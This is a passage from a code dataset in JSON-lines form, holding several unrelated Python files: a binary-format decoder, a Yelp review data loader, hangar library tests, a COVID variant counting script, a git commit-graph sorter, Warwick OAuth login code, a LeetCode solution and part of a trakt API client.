ARRAY_TERMINATED = auto()\n DICT_LENGTHED = auto()\n DICT_TERMINATED = auto()\n\n @staticmethod\n def get_type(obj_type) -> 'OPackObjectType':\n if obj_type == 1 or obj_type == 2:\n return OPackObjectType.BOOL\n if obj_type == 3:\n return OPackObjectType.TERMINATOR\n if obj_type == 6:\n return OPackObjectType.TIMESTAMP\n if 8 <= obj_type <= 0x36 and obj_type != 0x31 and obj_type != 0x34:\n return OPackObjectType.INT\n if 0x40 <= obj_type <= 0x64:\n return OPackObjectType.STRING\n if 0x70 <= obj_type <= 0x94:\n return OPackObjectType.BYTES\n if 0xD0 <= obj_type <= 0xDF:\n if obj_type == 0xDF:\n return OPackObjectType.ARRAY_TERMINATED\n return OPackObjectType.ARRAY_LENGTHED\n if 0xE0 <= obj_type <= 0xEF:\n if obj_type == 0xEF:\n return OPackObjectType.DICT_TERMINATED\n return OPackObjectType.DICT_LENGTHED\n raise InvalidTypeError(f'Invalid object type: {obj_type}')\n","repo_name":"loriwitt/opack","sub_path":"opack/object_types.py","file_name":"object_types.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"70096642337","text":"from __future__ import print_function\nimport pandas as pd\nimport psycopg2\nimport pkg_resources\n\nfrom helper.text_preprocessing import add_negation\nfrom nltk.stem.snowball import SnowballStemmer\n\n\n\"\"\"\nScripts to parse the data and store in\nmanageable formats / read data into\npandas DataFrame\n\nresources in /data\n\"\"\"\n\n\ndef merge():\n \"\"\"\n merge academic and phoenix datasets\n \"\"\"\n print(\"Reading files...\")\n file1 = pkg_resources.resource_filename(__name__, \"/data/academic_review.csv\")\n file2 = pkg_resources.resource_filename(__name__, \"/data/phoenix_review.csv\")\n output = pkg_resources.resource_filename(__name__, \"/data/training_review.csv\")\n df1 = pd.read_csv(file1, index_col=0)\n df2 = pd.read_csv(file2, 
index_col=0)\n df = pd.concat([df1, df2])\n print(\"Done.\")\n print(\"Writing...\")\n df.to_csv(output, index=False)\n print(\"Done.\")\n\n\ndef _add_line(cursor, values):\n \"\"\"\n Insert a line in the database\n \"\"\"\n values['votes'] = values['votes'].replace(\"'\", '\"')\n values['votes'] = values['votes'].replace('u\"', '\"')\n cursor.execute(\"\"\"INSERT INTO review (business_id, date, review_id, stars, text, type, votes)\n VALUES (%(business_id)s, %(date)s, %(review_id)s, %(stars)s, %(text)s, %(type)s, %(votes)s)\"\"\",\n values)\n\n\ndef create_db(database, user, password):\n \"\"\"\n Write data into postgres database\n \"\"\"\n source = pkg_resources.resource_filename(__name__, \"data/training_review.csv\")\n df = pd.read_csv(source)\n connection = psycopg2.connect(database=database, user=user, password=password)\n cursor = connection.cursor()\n cursor.execute(\"DROP TABLE IF EXISTS review\")\n cursor.execute(\"CREATE TABLE review (\"\n \" business_id CHAR(22),\"\n \" date DATE,\"\n \" review_id CHAR(22),\"\n \" stars SMALLINT,\"\n \" text TEXT,\"\n \" type CHAR(6),\"\n \" user_id CHAR(22),\"\n \" votes JSON\"\n \")\")\n for row in df.iterrows():\n values = dict(row[1])\n _add_line(cursor, values)\n connection.commit()\n cursor.close()\n connection.close()\n\n\ndef _stemmed_set(training=True):\n \"\"\"\n create csv file with stemmed reviews\n \"\"\"\n if training:\n df = read_yelp_set(['text', 'stars'])\n data = 'training'\n else:\n df = read_yelp_set(['text', 'stars'], data='test')\n data = 'test'\n stemmer = SnowballStemmer(\"english\")\n\n def stem(word):\n try:\n return stemmer.stem(word)\n except:\n return word\n\n df.text = [u' '.join(map(stem, text.split())) for text in df.text]\n filename = pkg_resources.resource_filename(__name__, 'data/stemmed_%s_review.csv' % data)\n with open(filename, \"w+\") as output:\n df.to_csv(output, encoding='utf8', index=False)\n\n\ndef read_yelp_set(columns=None, data='training', stem=False, preprocess=False):\n \"\"\"\n Read yelp data set into a Pandas DataFrame\n :param columns: list columns to return\n :param data: 'training' or 'test'\n :param stem: stem words in 'text' column if True\n :param preprocess:\n :return: pandas dataframe\n \"\"\"\n if not data in ['training', 'test']:\n raise ValueError('data must be either \"training\" or \"test\"')\n if stem:\n prfix = \"stemmed_\"\n else:\n prfix = \"\"\n filename = pkg_resources.resource_filename(__name__, \"data/%s%s_review.csv\" % (prfix, data))\n df = pd.read_csv(filename, encoding='utf8').fillna(u'')\n if columns:\n df = df[columns]\n if preprocess:\n df.text = add_negation(map(unicode.lower, df.text))\n return df\n\n\ndef training_set():\n \"\"\"\n :return: a DataFrame consisting of stemmed text reviews and star ratings\n from the training set\n \"\"\"\n return read_yelp_set(['text', 'stars'], stem=True, preprocess=True)\n\n\ndef test_set():\n \"\"\"\n :return: a DataFrame consisting of stemmed text reviews and ratings\n from the test set.\n \"\"\"\n return read_yelp_set(['text', 'stars'], data='test', stem=True, preprocess=True)\n\nif __name__ == \"__main__\":\n _stemmed_set(training=False)","repo_name":"tianhuil/dataprojects","sub_path":"francesco/yelp_data.py","file_name":"yelp_data.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"19197532670","text":"import os\nimport pytest\nfrom hangar import Repository\n\n\ndef test_imports():\n import hangar\n from hangar import 
Repository\n\n\ndef test_starting_up_repo_warns_should_exist_no_args(managed_tmpdir):\n with pytest.warns(UserWarning):\n repo = Repository(path=managed_tmpdir)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_starting_up_repo_warns_should_exist_manual_args(managed_tmpdir):\n with pytest.warns(UserWarning):\n repo = Repository(path=managed_tmpdir, exists=True)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_starting_up_repo_does_not_warn_not_exist_manual_args(managed_tmpdir):\n with pytest.warns(None) as warn_recs:\n repo = Repository(path=managed_tmpdir, exists=False)\n assert len(warn_recs) == 0\n\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n assert repo.list_branches() == ['master']\n assert os.path.isdir(repo._repo_path)\n assert str(repo._repo_path) == os.path.join(managed_tmpdir, '.hangar')\n co = repo.checkout(write=True)\n assert co.diff.status() == 'CLEAN'\n co.close()\n repo._env._close_environments()\n\n\ndef test_initial_read_checkout(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n with pytest.raises(ValueError):\n repo.checkout()\n repo._env._close_environments()\n\n\ndef test_initial_arrayset(managed_tmpdir, randomsizedarray):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n\n w_checkout = repo.checkout(write=True)\n assert len(w_checkout.columns) == 0\n with pytest.raises(KeyError):\n w_checkout.columns['aset']\n aset = w_checkout.add_ndarray_column('aset', prototype=randomsizedarray)\n assert aset.column == 'aset'\n w_checkout.close()\n repo._env._close_environments()\n\n\ndef test_empty_commit(managed_tmpdir, caplog):\n repo = Repository(path=managed_tmpdir, exists=False)\n repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n w_checkout = repo.checkout(write=True)\n with pytest.raises(RuntimeError):\n w_checkout.commit('this is a merge message')\n w_checkout.close()\n repo._env._close_environments()\n\n\ndef test_cannot_operate_without_repo_init(managed_tmpdir):\n repo = Repository(path=managed_tmpdir, exists=False)\n\n with pytest.raises(RuntimeError):\n repo.writer_lock_held()\n with pytest.raises(RuntimeError):\n repo.checkout()\n with pytest.raises(RuntimeError):\n repo.writer_lock_held()\n with pytest.raises(RuntimeError):\n repo.log()\n with pytest.raises(RuntimeError):\n repo.summary()\n with pytest.raises(RuntimeError):\n repo.merge('fail', 'master', 'nonexistant')\n with pytest.raises(RuntimeError):\n repo.create_branch('test')\n with pytest.raises(RuntimeError):\n repo.list_branches()\n with pytest.raises(RuntimeError):\n repo.force_release_writer_lock()\n\n with pytest.raises(RuntimeError):\n repo.remote.add('origin', 'foo')\n with pytest.raises(RuntimeError):\n repo.remote.remove('origin')\n with 
pytest.raises(RuntimeError):\n        repo.remote.fetch('origin', 'master')\n    with pytest.raises(RuntimeError):\n        repo.remote.fetch_data('origin', branch='master')\n    with pytest.raises(RuntimeError):\n        repo.remote.list_all()\n    with pytest.raises(RuntimeError):\n        repo.remote.ping('origin')\n    with pytest.raises(RuntimeError):\n        repo.remote.push('origin', 'master')\n    with pytest.raises(RuntimeError):\n        repo.remove_branch('master')\n\n    with pytest.raises(RuntimeError):\n        repo.path\n    with pytest.raises(RuntimeError):\n        repo.version\n    with pytest.raises(RuntimeError):\n        repo.writer_lock_held\n    with pytest.raises(RuntimeError):\n        repo.size_human\n    with pytest.raises(RuntimeError):\n        repo.size_nbytes\n\n    assert repo._env.repo_is_initialized is False\n\n\ndef test_check_repo_size(repo_20_filled_samples):\n    from hangar.utils import parse_bytes, folder_size\n\n    expected_nbytes = folder_size(repo_20_filled_samples._repo_path, recurse=True)\n    nbytes = repo_20_filled_samples.size_nbytes\n    assert expected_nbytes == nbytes\n\n    format_nbytes = repo_20_filled_samples.size_human\n    # account for rounding when converting int to str.\n    assert nbytes * 0.95 <= parse_bytes(format_nbytes) <= nbytes * 1.05\n\n\ndef test_force_release_writer_lock(managed_tmpdir, monkeypatch):\n\n    repo = Repository(path=managed_tmpdir, exists=False)\n    repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n    co = repo.checkout(write=True)\n    orig_lock = str(co._writer_lock)\n\n    def mock_true(*args, **kwargs):\n        return True\n\n    # try to release the writer lock with a process which has different uid\n    co._writer_lock = 'lololol'\n    with pytest.raises(RuntimeError):\n        monkeypatch.setattr(co, '_verify_alive', mock_true)\n        monkeypatch.setattr(co._columns, '_destruct', mock_true)\n        co.close()\n    # replace, but rest of object is closed\n    monkeypatch.setattr(co, '_writer_lock', orig_lock)\n    monkeypatch.delattr(co._columns, '_destruct')\n    co.close()\n    repo._env._close_environments()\n\n\ndef test_force_release_writer_lock_works(managed_tmpdir):\n    repo = Repository(path=managed_tmpdir, exists=False)\n    repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n    co = repo.checkout(write=True)\n\n    # try to release the writer lock with a process which has different uid\n    with pytest.warns(ResourceWarning):\n        repo.force_release_writer_lock()\n\n    assert co._writer_lock == 'LOCK_AVAILABLE'\n    co.close()\n    # replace, but rest of object is closed\n    repo._env._close_environments()\n\n\ndef test_repo_summary_does_not_error_before_any_commit_made(capfd, managed_tmpdir):\n    repo = Repository(path=managed_tmpdir, exists=False)\n    repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n\n    assert repo.summary() is None\n    out, _ = capfd.readouterr()\n    assert 'No commits have been made in the repository' in out\n    repo._env._close_environments()\n\n\ndef test_get_ecosystem_details(managed_tmpdir):\n    repo = Repository(path=managed_tmpdir, exists=False)\n    repo.init(user_name='tester', user_email='foo@test.bar', remove_old=True)\n    eco = repo._ecosystem_details()\n    assert isinstance(eco, dict)\n    assert 'host' in eco\n    assert 'packages' in eco\n    for package_name, version in eco['packages']:\n        assert version is not None\n    repo._env._close_environments()\n\n\ndef test_inject_repo_version(monkeypatch):\n    import hangar\n    monkeypatch.setattr(\"hangar.__version__\", '0.2.0')\n    assert hangar.__version__ == '0.2.0'\n\n\ndef test_check_repository_version(aset_samples_initialized_repo):\n    from hangar import __version__\n    from pkg_resources 
import parse_version\n\n repo = aset_samples_initialized_repo\n assert repo.version == parse_version(__version__).public\n\n\ndef test_check_repository_software_version_startup(managed_tmpdir):\n from hangar import Repository, __version__\n from pkg_resources import parse_version\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n repo._env._close_environments()\n\n nrepo = Repository(managed_tmpdir, exists=True)\n assert nrepo.initialized is True\n assert nrepo.version == parse_version(__version__).public\n nrepo._env._close_environments()\n\n\n@pytest.mark.parametrize('repo_v,hangar_v', [\n ['0.2.0', '0.3.0'],\n ['0.2.0', '0.3.1rc1'],\n ['0.2.0', '0.3.1.dev0'],\n ['0.2.0', '0.3.1'],\n ['0.3.0', '0.4.1.dev0'],\n ['0.3.0', '0.4.1rc1'],\n ['0.3.0', '0.4.0'],\n ['0.3.0', '0.4.1'],\n ['0.4.0', '0.5.0.dev0'],\n ['0.4.0', '0.5.0rc1'],\n ['0.4.0', '0.5.0'],\n ['0.4.0', '0.5.1'],\n ['0.5.0.dev0', '0.4.0'],\n ['0.5.0.dev0', '0.4.1'],\n ['0.5.0', '0.4.1'],\n])\ndef test_check_repository_software_version_fails_hangar_version(monkeypatch, managed_tmpdir, repo_v, hangar_v):\n import hangar\n monkeypatch.setattr(\"hangar.__version__\", hangar_v)\n monkeypatch.setattr(\"hangar.context.__version__\", hangar_v)\n from hangar import Repository\n from hangar.records.vcompat import set_repository_software_version\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n # force writing of new software version. should trigger error on next read.\n set_repository_software_version(repo._env.branchenv, repo_v, overwrite=True)\n try:\n assert repo.version == repo_v\n finally:\n repo._env._close_environments()\n\n assert hangar.__version__ == hangar_v\n\n with pytest.raises(RuntimeError):\n Repository(managed_tmpdir, exists=True)\n\n\n@pytest.mark.parametrize('futureVersion', ['1.0.0', '0.14.1', '0.15.0', '1.4.1'])\ndef test_check_repository_software_version_works_on_newer_hangar_version(managed_tmpdir, monkeypatch, futureVersion):\n from hangar import Repository\n\n repo = Repository(managed_tmpdir, exists=False)\n repo.init('test user', 'test@foo.bar', remove_old=True)\n old_version = repo.version\n # force writing of new software version. 
is not required here; a newer\n    # hangar must still open a repo created by an older version.\n    repo._env._close_environments()\n\n    import hangar\n    monkeypatch.setattr(hangar, '__version__', futureVersion)\n    nrepo = Repository(managed_tmpdir, exists=True)\n    assert hangar.__version__ == futureVersion\n    assert nrepo.version == old_version\n    nrepo._env._close_environments()\n","repo_name":"tensorwerk/hangar-py","sub_path":"tests/test_initiate.py","file_name":"test_initiate.py","file_ext":"py","file_size_in_byte":10276,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"34"} +{"seq_id":"31586381562","text":"# Convert GISAID metadata file to day counts:\n# \n# Suitable for binomial regression\n\nimport argparse\nparser=argparse.ArgumentParser()\nparser.add_argument('-v', '--variant', type=str,default=\"BA.2.86\", help=\"Name of variant\")\n#parser.add_argument('-m', '--mutation', type=str,default=\"\", help=\"Key mutations\")\nparser.add_argument('-f', '--mindate', default=\"2019-01-01\", help=\"Min sample date of sequence\")\nparser.add_argument('-t', '--maxdate', default=\"9999-12-31\", help=\"Max sample date of sequence\")\nparser.add_argument('-g', '--gisaid', action=\"store_true\", help=\"Use GISAID data instead of COG-UK data\")\nargs=parser.parse_args()\n\nfrom stuff import *\nfp=sys.stdin\nif args.gisaid:\n  keys=[\"Collection date\",\"Lineage\",\"AA Substitutions\"]\n  sep=\"\\t\"\n  keymutations=[\"NSP2_A31D\",\"Spike_L452W\",\"M_T30A\",\"NSP3_N1708S\",\"Spike_I332V\",\"Spike_V445H\",\"Spike_E484K\",\"N_Q229K\",\"Spike_A264D\",\"Spike_V127F\",\"Spike_S50L\"]\nelse:\n  keys=[\"sample_date\",\"lineage\",\"mutations\"]\n  sep=\",\"\n  keymutations=[\"orf1ab:A211D\",\"S:L452W\",\"M:T30A\",\"orf1ab:N2526S\",\"S:I332V\",\"S:V445H\",\"S:E484K\",\"N:Q229K\",\"S:A264D\",\"S:V127F\",\"S:S50L\"]\n\nd={}\nfor (date,lineage,mutations) in csvrows_it(fp,keys,sep=sep):\n  if len(date)!=10 or date<args.mindate or date>args.maxdate: continue\n  if date not in d: d[date]=[0,0]\n  if lineage==\"\": continue\n  var=int(lineage.split()[0]==args.variant)\n  if not var:\n    n=len(keymutations)\n    k=len([m for m in keymutations if m in mutations])\n    if k>n/2: var=1\n  d[date][var]+=1\n\nfor date in sorted(list(d)):\n  print(date,\"%6d %6d\"%tuple(d[date]))\n","repo_name":"alex1770/Covid-19","sub_path":"VOCgrowth/BA.2.86_estimates/conv_to_daycounts.py","file_name":"conv_to_daycounts.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"39886823013","text":"#!/usr/bin/python3\n\n# Prithvi Kannan\n# UID: 405110096\n\nimport os\nimport zlib\nimport sys\n\nclass CommitNode:\n    def __init__(self, commit_hash):\n        \"\"\"\n        :type commit_hash: str\n        \"\"\"\n        self.commit_hash = commit_hash\n        self.parents = set()\n        self.children = set()\n\n    def __str__(self):\n        return 'Commit Hash: ' + self.commit_hash\n\ndef getObjectDir():\n    top_level = find_root(os.getcwd())\n    object_dir = top_level + '/.git/objects/'\n    return object_dir\n\ndef find_root(test, dirs=(\".git\",), default=None):\n    prev, test = None, os.path.abspath(test)\n    while prev != test:\n        if any(os.path.isdir(os.path.join(test, d)) for d in dirs):\n            return test\n        prev, test = test, os.path.abspath(os.path.join(test, os.pardir))\n    sys.stderr.write('Not inside a Git repository')\n    exit(1)\n\ndef get_parents_of(hash):\n    parent_hashes = []\n    path = getObjectDir() + hash[:2] + '/' + hash[2:]\n    contents = zlib.decompress(open(path, 'rb').read())\n    if (contents[:6] == b'commit'):\n        contents = 
contents.decode().split('\\n')\n for line in sorted(contents):\n if(line[:6] == 'parent'):\n parent_hash = line[7:]\n parent_hashes.append(parent_hash)\n return parent_hashes\n\ndef print_graph(nodes):\n for hash in sorted(nodes.keys()):\n node = nodes[hash]\n print('node - ' + node.commit_hash) \n for children in sorted(node.children):\n print('child - ', end='')\n print(children)\n for parent in sorted(node.parents):\n print('parent - ', end='')\n print(parent)\n print()\n\ndef build_graph(branch_hash):\n nodes = {}\n for hash in sorted(branch_hash.keys()):\n file_name = getObjectDir() + hash[:2] + '/' + hash[2:]\n contents = zlib.decompress(open(file_name, 'rb').read())\n if (contents[:6] == b'commit'):\n stack = [hash]\n while(len(stack) != 0):\n curr = stack.pop()\n if curr not in nodes:\n curr_node = CommitNode(curr)\n else:\n curr_node = nodes[curr]\n parents = get_parents_of(curr)\n for parent in sorted(parents):\n curr_node.parents.add(parent)\n if parent not in nodes:\n stack.append(parent)\n parent_node = CommitNode(parent)\n else:\n parent_node = nodes[parent]\n parent_node.children.add(curr)\n nodes[parent] = parent_node\n nodes[curr] = curr_node\n return nodes\n\ndef DFS_topo(nodes):\n visited = set()\n order = []\n sources = []\n for hash in sorted(nodes):\n if len(nodes[hash].parents) == 0:\n sources.append(hash)\n for source in sources:\n if source not in visited:\n stack = [source]\n while len(stack) != 0:\n curr = stack.pop()\n if curr not in visited:\n if len(nodes[curr].parents) > 1:\n path = []\n new_visited = []\n for parent in sorted(nodes[curr].parents):\n if parent not in visited:\n path = [parent]\n visited.add(parent)\n while len(path) != 0:\n new_curr = path.pop()\n for parent in sorted(nodes[new_curr].parents):\n if parent not in visited:\n path.append(parent)\n new_visited.append(new_curr)\n visited.add(new_curr)\n order.extend(new_visited[::-1])\n for c in sorted(nodes[curr].children):\n if c not in visited:\n stack.append(c)\n order.append(curr)\n visited.add(curr)\n return order\n\ndef get_branches(top_level):\n branch_hash = {}\n branches = os.listdir(top_level + '/.git/refs/heads/')\n for b in sorted(branches):\n hash = open(top_level + '/.git/refs/heads/' +\n b, 'r').read().strip('\\n')\n if hash not in branch_hash:\n temp = set()\n else:\n temp = branch_hash[hash]\n temp.add(b)\n branch_hash[hash] = temp\n return branch_hash\n\ndef print_topo_order(nodes, order, branch_hash):\n i = 0\n sticky = False\n while i < len(order):\n curr_id = order[i]\n curr_node = nodes[curr_id]\n if sticky:\n sticky = False\n sticky_start = \"=\"\n for child in sorted(curr_node.children):\n sticky_start += f'{child} '\n sticky_start = sticky_start.rstrip()\n print(sticky_start)\n print(curr_id, end='')\n if curr_id in branch_hash:\n for b in sorted(branch_hash[curr_id]):\n print(' ' + b, end='')\n print()\n if i != len(order) - 1:\n next_id = order[i+1]\n next_node = nodes[next_id]\n if curr_id not in next_node.children:\n end = \"\"\n for parent in sorted(curr_node.parents):\n end += f'{parent} '\n print(end.strip()+'=')\n print()\n sticky = True\n i += 1\n\ndef topo_order_commits():\n top_level = find_root(os.getcwd())\n branch_hash = get_branches(top_level)\n nodes = build_graph(branch_hash)\n order = DFS_topo(nodes)[::-1]\n return print_topo_order(nodes, order, branch_hash)\n\nif __name__ == '__main__':\n 
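# Build the commit graph from every branch head and print it in topological order.\n    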
topo_order_commits()\n","repo_name":"prithvikannan/cs-35l","sub_path":"assignment9/topo_order_commits.py","file_name":"topo_order_commits.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8593579659","text":"\"\"\"\nMethods that are used to authenticate the user with the Warwick oauth API\n\"\"\"\nimport urllib.parse\n\nfrom oauthlib.oauth1 import SIGNATURE_HMAC, SIGNATURE_TYPE_AUTH_HEADER\nfrom requests_oauthlib import OAuth1Session\nfrom django.conf import settings\n\nfrom .utils import CustomClient\nfrom .models import User, RequestTokenStore\nfrom .tabula import retreive_member_infomation\n\nACCESS_TOKEN_URL = \"https://websignon.warwick.ac.uk/oauth/accessToken\"\nAUTHORISE_URL = \"https://websignon.warwick.ac.uk/oauth/authorise?\"\nREQUEST_TOKEN_URL = \"https://websignon.warwick.ac.uk/oauth/requestToken?\"\n\nSCOPES = \"urn:websignon.warwick.ac.uk:sso:service urn:tabula.warwick.ac.uk:tabula:service\"\n\ndef obtain_request_token(callback='http://127.0.0.1:8000/callback/', expiry='forever'):\n    \"\"\"\n    This method obtains a request token by sending a signed request. Returns\n    a url to redirect the user to in order to authorize the token.\n    \"\"\"\n    oauth = OAuth1Session(\n        settings.CONSUMER_KEY,\n        client_secret=settings.CONSUMER_SECRET,\n        signature_method=SIGNATURE_HMAC,\n        signature_type=SIGNATURE_TYPE_AUTH_HEADER,\n        client_class=CustomClient,\n        callback_uri=callback\n    )\n    response = oauth.fetch_request_token(\n        url=REQUEST_TOKEN_URL + urllib.parse.urlencode({'scope': SCOPES, 'expiry': expiry})\n    )\n    # store the oauth_token_secret for later use when getting the access token\n    RequestTokenStore.objects.create(\n        oauth_token=response['oauth_token'],\n        oauth_token_secret=response['oauth_token_secret']\n    )\n\n    authorise_qs = urllib.parse.urlencode({'oauth_token': response['oauth_token']})\n    return AUTHORISE_URL + authorise_qs\n\n\ndef exchange_access_token(oauth_token, returned_url, user_id):\n    \"\"\"\n    This method gets an access token using an authorized request token. It then\n    either retrieves an existing user with the given user_id or creates a new user.\n    If a new User is created, their module info is populated. 
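Access tokens are cleared from the\n    user record once member information has been retrieved. 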
Returns the user.\n    \"\"\"\n    oauth_secret = RequestTokenStore.get_secret(oauth_token)\n    oauth = OAuth1Session(\n        settings.CONSUMER_KEY,\n        settings.CONSUMER_SECRET,\n        resource_owner_secret=oauth_secret,\n        client_class=CustomClient\n    )\n    oauth.parse_authorization_response(returned_url)\n    access_tokens = oauth.fetch_access_token(ACCESS_TOKEN_URL)\n\n    user = User.objects.filter(user_id=user_id).first()\n    if user is None:\n        # email will be set to their actual email in retreive_member_infomation().\n        user = User.objects.create(\n            email=user_id+'@email.com',\n            user_id=user_id,\n            access_token=access_tokens['oauth_token'],\n            access_token_secret=access_tokens['oauth_token_secret']\n        )\n        retreive_member_infomation(user, created=True)\n    else:\n        user.access_token = access_tokens['oauth_token']\n        user.access_token_secret = access_tokens['oauth_token_secret']\n        user.save()\n        retreive_member_infomation(user)\n\n    # delete tokens from account as not needed anymore.\n    user.access_token = ''\n    user.access_token_secret = ''\n    user.save()\n    # send user object back to view to be logged in.\n    return user","repo_name":"maxamuss/Warwick-CATulator","sub_path":"users/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"14883816525","text":"#\n# @lc app=leetcode.cn id=2215 lang=python3\n#\n# [2215] Find the Difference of Two Arrays\n#\n# https://leetcode-cn.com/problems/find-the-difference-of-two-arrays/description/\n#\n# algorithms\n# Easy (66.81%)\n# Likes: 6\n# Dislikes: 0\n# Total Accepted: 9.6K\n# Total Submissions: 14.4K\n# Testcase Example: '[1,2,3]\\n[2,4,6]'\n#\n# Given two 0-indexed integer arrays nums1 and nums2, return a list answer of length 2 where:\n#\n#\n# answer[0] is a list of all distinct integers in nums1 that are not present in nums2.\n# answer[1] is a list of all distinct integers in nums2 that are not present in nums1.\n#\n#\n# Note: the integers in the lists may be returned in any order.\n#\n#\n#\n# Example 1:\n#\n#\n# Input: nums1 = [1,2,3], nums2 = [2,4,6]\n# Output: [[1,3],[4,6]]\n# Explanation:\n# For nums1, nums1[1] = 2 appears at index 0 in nums2, while nums1[0] = 1 and nums1[2] = 3 do not appear in\n# nums2. Therefore, answer[0] = [1,3].\n# For nums2, nums2[0] = 2 appears at index 1 in nums1, while nums2[1] = 4 and nums2[2] = 6 do not appear in\n# nums1. Therefore, answer[1] = [4,6].\n#\n# Example 2:\n#\n#\n# Input: nums1 = [1,2,3,3], nums2 = [1,1,2,2]\n# Output: [[3],[]]\n# Explanation:\n# For nums1, nums1[2] and nums1[3] do not appear in nums2. Since nums1[2] == nums1[3], their value only\n# needs to appear once in answer[0], so answer[0] = [3].\n# Every integer in nums2 appears in nums1, so answer[1] = [].\n#\n#\n#\n#\n# Constraints:\n#\n#\n# 1 <= nums1.length, nums2.length <= 1000\n# -1000 <= nums1[i], nums2[i] <= 1000\n#\n#\n#\n\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n\n    def findDifference(self, nums1: List[int],\n                       nums2: List[int]) -> List[List[int]]:\n\n        ns1, ns2 = set(nums1), set(nums2)\n\n        return [list(ns1.difference(ns2)), list(ns2.difference(ns1))]\n\n\n# @lc code=end\n","repo_name":"1m188/algorithm","sub_path":"leetcode/1/2215.找出两数组的不同.py","file_name":"2215.找出两数组的不同.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7878494274","text":"# -*- coding: utf-8 -*-\n\"\"\"Objects, properties, and methods to be shared across other modules in the\ntrakt package\n\"\"\"\nfrom __future__ import print_function\nimport json\nimport logging\nimport os\nimport requests\nimport six\nimport sys\nfrom collections import namedtuple\nfrom functools import wraps\nfrom requests_oauthlib import OAuth2Session\nfrom trakt import errors\n\n__author__ = 'Jon Nappi'\n__all__ = ['Airs', 
'Alias', 'Comment', 'Genre', 'get', 'delete', 'post', 'put',\n 'init', 'BASE_URL', 'CLIENT_ID', 'CLIENT_SECRET', 'REDIRECT_URI',\n 'HEADERS', 'CONFIG_PATH', 'OAUTH_TOKEN', 'PIN_AUTH', 'OAUTH_AUTH',\n 'AUTH_METHOD', 'APPLICATION_ID']\n\n#: The base url for the Trakt API. Can be modified to run against different\n#: Trakt.tv environments\nBASE_URL = 'https://api-v2launch.trakt.tv/'\n\n#: The Trakt.tv OAuth Client ID for your OAuth Application\nCLIENT_ID = None\n\n#: The Trakt.tv OAuth Client Secret for your OAuth Application\nCLIENT_SECRET = None\n\n#: The OAuth2 Redirect URI for your OAuth Application\nREDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'\n\n#: Default request HEADERS\nHEADERS = {'Content-Type': 'application/json', 'trakt-api-version': '2'}\n\n#: Default path for where to store your trakt.tv API authentication information\nCONFIG_PATH = os.path.join(os.path.expanduser('~'), '.pytrakt.json')\n\n#: Your personal Trakt.tv OAUTH Bearer Token\nOAUTH_TOKEN = api_key = None\n\n#: Flag used to enable Trakt PIN authentication\nPIN_AUTH = 'PIN'\n\n#: Flag used to enable Trakt OAuth authentication\nOAUTH_AUTH = 'OAUTH'\n\n#: The currently enabled authentication method. Default is ``PIN_AUTH``\nAUTH_METHOD = PIN_AUTH\n\n#: The ID of the application to register with, when using PIN authentication\nAPPLICATION_ID = None\n\n\ndef _store(**kwargs):\n \"\"\"Helper function used to store Trakt configurations at ``CONFIG_PATH``\n\n :param kwargs: Keyword args to store at ``CONFIG_PATH``\n \"\"\"\n with open(CONFIG_PATH, 'w') as config_file:\n json.dump(kwargs, config_file)\n\n\ndef _get_client_info(app_id=False):\n \"\"\"Helper function to poll the user for Client ID and Client Secret\n strings\n\n :return: A 2-tuple of client_id, client_secret\n \"\"\"\n global APPLICATION_ID\n print('If you do not have a client ID and secret. Please visit the '\n 'following url to create them.')\n print('http://trakt.tv/oauth/applications')\n client_id = six.moves.input('Please enter your client id: ')\n client_secret = six.moves.input('Please enter your client secret: ')\n if app_id:\n msg = 'Please enter your application ID ({default}): '.format(\n default=APPLICATION_ID)\n user_input = six.moves.input(msg)\n if user_input:\n APPLICATION_ID = user_input\n return client_id, client_secret\n\n\ndef pin_auth(pin=None, client_id=None, client_secret=None, store=False):\n \"\"\"Generate an access_token from a Trakt API PIN code.\n\n :param pin: Optional Trakt API PIN code. If one is not specified, you will\n be prompted to go generate one\n :param store: Boolean flag used to determine if your trakt api auth data\n should be stored locally on the system. Default is :const:`False` for\n the security conscious\n :return: Your OAuth access token\n \"\"\"\n global OAUTH_TOKEN, CLIENT_ID, CLIENT_SECRET\n CLIENT_ID, CLIENT_SECRET = 